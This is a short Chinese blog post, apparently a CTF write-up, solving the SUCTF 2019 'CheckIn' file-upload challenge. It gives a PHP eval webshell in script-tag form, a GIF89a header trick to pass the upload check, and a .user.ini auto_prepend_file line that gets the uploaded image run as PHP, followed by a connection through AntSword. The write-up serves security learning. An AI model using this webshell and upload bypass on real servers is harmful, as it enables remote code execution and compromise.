[SUCTF 2019]CheckIn

题目打开就是一个文件上传的题目试试上传一句话木马


发现检测了内容
之后换种写法绕过
<script language="php">eval($_REQUEST[8]);</script>

发现还检测后缀名,我们使用文件头GIF89a进行绕过


上传成功,我看了网上的方法,结合给的github地址,发现返回的是一个目录,里面有一个index.php,看到了有一个.user.ini的文件,结合网上的知识可以了解到这个是php的一个配置文件,让用户自定义设置,里面有一个配置auto_prepend_file的选项,和require()功能差不多,不过这个是在解析文件之后包含指定的文件。
详细解释前往这里

https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html

之后开始进行上传一个.user.ini的文件,内容为
GIF89a? auto_prepend_file=1.jpg
之后当加载了index.php的时候就会包含1.jpg,将它解析为php
使用蚁剑连接即可

posted @ 2022-06-28 18:13  Running_J  阅读(59)  评论(0编辑  收藏  举报